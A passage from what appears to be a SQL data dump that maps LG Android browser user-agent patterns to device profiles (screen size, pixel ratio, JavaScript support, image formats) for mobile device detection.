Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F700L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F700S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F750K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-F820L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H340n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H340n-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H343) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H422) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H440n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H440n-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H440n/V20b) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H525) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H525n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H525n-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H540) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H542) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H631) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H635) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H734) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H735) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H736) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H740) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H810) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H811) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H812) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H815) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H815-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H815/V20m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H840) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H845) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H955) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H960) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-H961N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K240) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K371) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K373) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K425) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K430) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K500n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K535) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K540) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K557) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-K600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-M150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-M151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-M153) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-M154) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-M160) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-X230) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-X230YK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LG-X240) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGL53BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGL56VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGL57BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGL58VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGLS450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGLS676) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGLS755) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGLS770) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGLS775) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGLS991) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGMS428) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGMS550) AppleWebKit/* (KHTML, like Gecko) Chrome 